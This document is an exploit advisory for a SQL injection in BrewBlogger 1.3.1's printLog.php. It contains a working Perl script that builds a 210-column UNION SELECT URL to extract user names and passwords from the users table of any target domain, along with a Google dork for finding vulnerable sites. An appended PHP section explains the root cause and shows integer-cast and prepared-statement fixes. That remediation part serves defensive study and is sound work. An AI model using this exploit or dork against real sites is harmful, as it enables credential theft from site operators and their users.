
BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability

#!/usr/bin/perl
###########################################################################################
#Target:
#
#     BrewBlogger 1.3.1
#     http://brewblogger.zkdigital.com
#
#Vulnerability:
#
#     SQL Injection
#
#Description:
#
#     BrewBlogger does not properly sanitize the 'id' parameter passed to printLog.php.
#     The value is run through addslashes(), but it is then interpolated unquoted into
#     the query (%s), so a numeric-context payload such as "0 UNION SELECT ..." contains
#     nothing for addslashes() to escape and reaches MySQL verbatim. Since each user
#     entry has an auto-incrementing ID number, it is possible to enumerate every user
#     name and password stored in the 'users' table by iterating through the IDs.
#
#Vulnerable Code (truncated):
#
#     $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
#     $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
#     $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Output:
#     This script prints a URL which will reveal the user name and password for
#     the specified ID. If no ID is specified, 2 is used (usually the ID of the
#     first user). The user name will be listed as "Method:" under 'General
#     Information', and the password will be listed as "Cost:".
#
#Usage:
#     ./brewblogger.pl <domain name + path> [user id]
#
#Examples:
#
#     ./brewblogger.pl www.beerblog.com 3
#     ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
#     intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
#     Craig Heffner
#     heffnercj [at] gmail.com
#     http://www.craigheffner.com
###########################################################################################


use strict;
use warnings;

print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
#                                         #
# Discovered and coded by: Craig Heffner  #
###########################################
';

if (!$ARGV[0] || $ARGV[0] eq "-h") {
    print "\nUsage: ./brewblogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
    exit;
}

# Default to user ID 2, which is normally the first account created.
my $id = $ARGV[1] ? $ARGV[1] : 2;

# id=0 matches no brewing log, so the only row printLog.php renders is the
# one supplied by the UNION SELECT.
my $url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";

# A UNION must supply as many values as "SELECT * FROM brewing" returns
# (210 columns). Columns 8 and 9 are rendered as "Method:" and "Cost:" on
# the print page, so user_name and password go there; the rest are filler.
my @cols;
for my $a (1 .. 210) {
    if ($a == 8) {
        push @cols, "user_name";
    } elsif ($a == 9) {
        push @cols, "password";
    } else {
        push @cols, "1";
    }
}
my $string = join(",", @cols);

print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;
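The root cause is that addslashes() only neutralises quote characters, while the injection point is an unquoted integer. The following PHP is an added example, not BrewBlogger's own code: it places the original query construction beside two hardened forms. The variable names follow the snippet in the advisory; `$mysqli` is an assumed mysqli connection handle (the project used the legacy mysql_* API, so that function is illustrative), and the demo payload uses 10 UNION columns for readability rather than the 210 the real table needs.

```php
<?php
// Added example, not part of BrewBlogger. Shows why addslashes() does not
// stop the printLog.php injection and two ways to close it.

// Vulnerable, as in printLog.php (the magic_quotes branch is equivalent):
// addslashes() escapes only ' " \ and NUL. The value is interpolated with an
// unquoted %s, so "0 UNION SELECT ..." contains nothing to escape and is
// passed to MySQL verbatim.
function build_query_vulnerable($id) {
    $colname_log = addslashes($id);
    return sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
}

// Fix 1: enforce the integer type before the value touches SQL. The explicit
// cast turns "0 UNION SELECT ..." into 0 and %d can only emit digits.
function build_query_fixed($id) {
    return sprintf("SELECT * FROM brewing WHERE id = %d", (int) $id);
}

// Fix 2 (assumes a mysqli connection $mysqli): a prepared statement sends the
// parameter separately from the SQL text, so no escaping decision is needed.
// get_result() requires the mysqlnd driver.
function fetch_log(mysqli $mysqli, $id) {
    $stmt = $mysqli->prepare("SELECT * FROM brewing WHERE id = ?");
    $stmt->bind_param("i", $id);   // "i" binds as integer
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc();
}

// Constructed payload, shortened to 10 columns for illustration.
$payload = "0 UNION SELECT 1,1,1,1,1,1,1,user_name,password,1 FROM users WHERE id=2";

echo build_query_vulnerable($payload), "\n";
// SELECT * FROM brewing WHERE id = 0 UNION SELECT 1,1,1,1,1,1,1,user_name,password,1 FROM users WHERE id=2

echo build_query_fixed($payload), "\n";
// SELECT * FROM brewing WHERE id = 0
```

The first echo shows the attacker's UNION surviving addslashes() untouched; the second shows the cast reducing it to the literal 0. Fix 1 is the minimal change for code still on the mysql_* API; Fix 2 is the form to move to when the database layer is modernised.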
